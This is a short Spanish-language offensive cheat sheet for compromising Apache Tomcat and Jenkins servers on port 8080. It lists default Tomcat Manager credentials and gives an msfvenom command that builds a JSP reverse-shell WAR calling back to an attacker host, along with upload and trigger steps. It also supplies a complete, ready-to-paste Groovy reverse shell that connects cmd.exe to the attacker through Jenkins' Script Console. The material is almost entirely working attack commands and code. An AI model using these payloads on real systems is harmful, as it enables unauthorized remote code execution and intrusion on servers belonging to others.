Tomcat & Jenkins

1. Tomcat (8080)

Si adivinas la password del Manager App (admin:admin, tomcat:s3cret). 1. Crear Payload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<KALI> LPORT=443 -f war > shell.war

2. Subir: Ve a /manager/html, sección "WAR file to deploy". 3. Ejecutar: Navega a http://<IP>:8080/shell.

2. Jenkins (8080)

Integración continua. RCE por diseño. 1. Script Console: Ve a Combine -> Manage Jenkins -> Script Console. 2. Groovy Reverse Shell:

String host="<KALI>";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

3. Dale a "Run".